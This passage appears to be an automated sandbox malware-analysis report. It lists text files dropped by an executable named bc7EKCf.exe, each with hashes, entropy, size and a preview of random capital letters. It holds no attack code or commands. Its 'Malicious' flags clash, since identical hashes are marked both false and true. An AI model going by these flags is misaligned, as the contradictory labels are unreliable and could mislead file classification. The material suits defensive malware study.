                                                                                                                                                                                                                                                                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                                                  MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                                                  SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                                                  SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                                                  SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:true
